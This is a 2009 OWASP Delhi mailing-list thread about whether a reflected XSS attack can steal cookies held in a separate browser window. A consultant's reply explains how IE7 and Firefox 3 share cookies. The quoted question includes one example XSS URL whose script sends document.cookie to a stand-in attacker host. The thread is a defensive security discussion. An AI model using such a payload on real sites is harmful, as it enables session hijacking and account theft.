Excellent information! Thanks Karthik!!
On Fri, Mar 20, 2009 at 10:46 AM, Karthik Muthukrishnan < karthik.muthukrish...@tcs.com> wrote: > Whether cookies are shared between browser windows depends on various > factors like browser vendor and how the new browser windows is launched. > Due to these inconsistencies it is good for web application security > professionals to assume that cookies will be shared across browser windows > and tabs. As you might all know, cookies will not be shared across browsers > from different vendors. > > Examples: > > In Win XP SP3 IE7: > a. Cookies will be shared if the different browser windows belong to the > same process. During normal use, this happens when one right-clicks a link > and then chooses new tab or new window. > b. Cookies will not be shared if the browser windows belong to separate > processes. During normal use, this happens when Internet Explorer icon (in > desktop or startmenu) is double clicked. > > In Win XP SP3 Firefox 3.0.x: > Firefox maintains only one process, so cookies are shared between all > windows and tabs. > > Karthik > > -- > Karthik Muthukrishnan, CISSP ISSAP, > Information Security Consultant > Tata Consultancy Services > > > > Parmendra Sharma > <s.parmen...@gmai > l.com> To > Sent by: owasp-delhi@lists.owasp.org > owasp-delhi-bounc cc > e...@lists.owasp.or > g Subject > [Owasp-delhi] Regarding XSS Issue > > 19/03/2009 09:29 > AM > > > > > > > > Dear all, > > I have a little problem regarding XSS and here it is.... > > To perform an XSS attack an attacker steals cookies (in this case) of an > already logged in user. > > In this scenerio : > > -> The user is logged in "VulnerableRealBank.com" website in one browser. > > -> Now this user opens his email account in a different browser (and not in > the new tab of the above browser) and clicks upon the link given > > http://VulnerableRealBank.com/index.php?sessionid=12412412&; > username=<script>document.location='http://attacker > host.example/cgi-bin/cookiesteal.cgi?'+document.cookie</script> > > Now my Questions: > > -> Will the script that is reflected back from the vulnerable domain is > capable to send the cookies to the atttacker that are maintained by the > first browser. > > -> Is above thing possible if i says that i am using the browser version > that do not shares cookies for the same domain requests. > > -> Is this the problem that is totally independent from the browsers > versions and is only the functionality of the script that is sending > cookies. > > Waiting for your responses :-) > > > -- > Thanks and Regards: > > Parmendra Sharma > Indian Computer Emergency Response Team (CERT-In) > Ministry of Information Technology > Government of India > 6 C.G.O Complex > Lodhi Road > New Delhi_______________________________________________ > Owasp-delhi mailing list > Owasp-delhi@lists.owasp.org > https://lists.owasp.org/mailman/listinfo/owasp-delhi > > ForwardSourceID:NT0001359A > > =====-----=====-----===== > Notice: The information contained in this e-mail > message and/or attachments to it may contain > confidential or privileged information. If you are > not the intended recipient, any dissemination, use, > review, distribution, printing or copying of the > information contained in this e-mail message > and/or attachments to it are strictly prohibited. If > you have received this communication in error, > please notify us by reply e-mail or telephone and > immediately and permanently delete the message > and any attachments. Thank you > > > > _______________________________________________ > Owasp-delhi mailing list > Owasp-delhi@lists.owasp.org > https://lists.owasp.org/mailman/listinfo/owasp-delhi > -- Gunwant Singh
_______________________________________________ Owasp-delhi mailing list Owasp-delhi@lists.owasp.org https://lists.owasp.org/mailman/listinfo/owasp-delhi
